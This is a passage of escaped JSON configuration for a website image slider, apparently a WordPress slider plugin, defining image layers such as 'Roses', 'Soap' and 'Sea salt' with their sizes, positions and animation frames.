From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"ABC\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic6.png\",\"imageId\":3311},\"size\":{\"width\":{\"d\":{\"v\":\"1629px\",\"e\":true},\"n\":{\"v\":\"1360px\",\"e\":true},\"t\":{\"v\":\"1269px\",\"e\":true},\"m\":{\"v\":\"1269px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"1105px\",\"e\":true},\"n\":{\"v\":\"923px\",\"e\":true},\"t\":{\"v\":\"862px\",\"e\":true},\"m\":{\"v\":\"862px\",\"e\":true}},\"originalWidth\":1629,\"originalHeight\":1105,\"aspectRatio\":{\"d\":{\"v\":1.4742081447963801821288143401034176349639892578125},\"n\":{\"v\":1.4742081447963801821288143401034176349639892578125},\"t\":{\"v\":1.4742081447963801821288143401034176349639892578125},\"m\":{\"v\":1.4742081447963801821288143401034176349639892578125}}},\"position\":{\"x\":{\"d\":{\"v\":\"-35px\",\"e\":true},\"n\":{\"v\":\"-9px\",\"e\":true},\"t\":{\"v\":\"-250px\",\"e\":true},\"m\":{\"v\":\"-274px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-24px\",\"e\":true},\"n\":{\"v\":\"-100px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"47px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Roses\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/h4-slide1-graphic2-1.png\",\"imageId\":4208},\"size\":{\"width\":{\"d\":{\"v\":\"375px\",\"e\":true},\"n\":{\"v\":\"250px\",\"e\":true},\"t\":{\"v\":\"250px\"},\"m\":{\"v\":\"105px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"391px\",\"e\":true},\"n\":{\"v\":\"261px\",\"e\":true},\"t\":{\"v\":\"261px\"},\"m\":{\"v\":\"110px\",\"e\":true}},\"originalWidth\":416,\"originalHeight\":434,\"aspectRatio\":{\"d\":{\"v\":0.95852534562211977320345113184885121881961822509765625},\"n\":{\"v\":0.95852534562211977320345113184885121881961822509765625},\"t\":{\"v\":0.95852534562211977320345113184885121881961822509765625},\"m\":{\"v\":0.95852534562211977320345113184885121881961822509765625}}},\"position\":{\"x\":{\"d\":{\"v\":\"-70px\",\"e\":true},\"n\":{\"v\":\"-21px\",\"e\":true},\"t\":{\"v\":\"-21px\"},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-43px\",\"e\":true},\"n\":{\"v\":\"-38px\",\"e\":true},\"t\":{\"v\":\"-38px\"},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Soap\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic3.png\",\"imageId\":3313},\"size\":{\"width\":{\"d\":{\"v\":\"334px\",\"e\":true},\"n\":{\"v\":\"216px\",\"e\":true},\"t\":{\"v\":\"134px\",\"e\":true},\"m\":{\"v\":\"134px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"313px\",\"e\":true},\"n\":{\"v\":\"202px\",\"e\":true},\"t\":{\"v\":\"125px\",\"e\":true},\"m\":{\"v\":\"125px\",\"e\":true}},\"originalWidth\":334,\"originalHeight\":313,\"aspectRatio\":{\"d\":{\"v\":1.0670926517571885927537778115947730839252471923828125},\"n\":{\"v\":1.0670926517571885927537778115947730839252471923828125},\"t\":{\"v\":1.0670926517571885927537778115947730839252471923828125},\"m\":{\"v\":1.0670926517571885927537778115947730839252471923828125}}},\"position\":{\"x\":{\"d\":{\"v\":\"290px\",\"e\":true},\"n\":{\"v\":\"279px\",\"e\":true},\"t\":{\"v\":\"32px\",\"e\":true},\"m\":{\"v\":\"42px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"70px\",\"e\":true},\"n\":{\"v\":\"105px\",\"e\":true},\"t\":{\"v\":\"139px\",\"e\":true},\"m\":{\"v\":\"109px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":170},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2260,\"start\":170,\"startRelative\":170},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":2260,\"start\":170,\"startRelative\":170},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":6570,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Sea salt\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic1.png\",\"imageId\":3314},\"size\":{\"width\":{\"d\":{\"v\":\"336px\",\"e\":true},\"n\":{\"v\":\"225px\",\"e\":true},\"t\":{\"v\":\"225px\"},\"m\":{\"v\":\"147px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"288px\",\"e\":true},\"n\":{\"v\":\"193px\",\"e\":true},\"t\":{\"v\":\"193px\"},\"m\":{\"v\":\"126px\",\"e\":true}},\"originalWidth\":336,\"originalHeight\":288,\"aspectRatio\":{\"d\":{\"v\":1.1666666666666667406815349750104360282421112060546875},\"n\":{\"v\":1.1666666666666667406815349750104360282421112060546875},\"t\":{\"v\":1.1666666666666667406815349750104360282421112060546875},\"m\":{\"v\":1.1666666666666667406815349750104360282421112060546875}}},\"position\":{\"x\":{\"d\":{\"v\":\"419px\",\"e\":true},\"n\":{\"v\":\"401px\",\"e\":true},\"t\":{\"v\":\"48px\",\"e\":true},\"m\":{\"v\":\"48px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"67px\",\"e\":true},\"n\":{\"v\":\"39px\",\"e\":true},\"t\":{\"v\":\"26px\",\"e\":true},\"m\":{\"v\":\"26px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":70},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":\"{-90,90}\",\"rotationZ\":\"45deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1160,\"start\":70,\"startRelative\":70},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1160,\"start\":70,\"startRelative\":70},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim 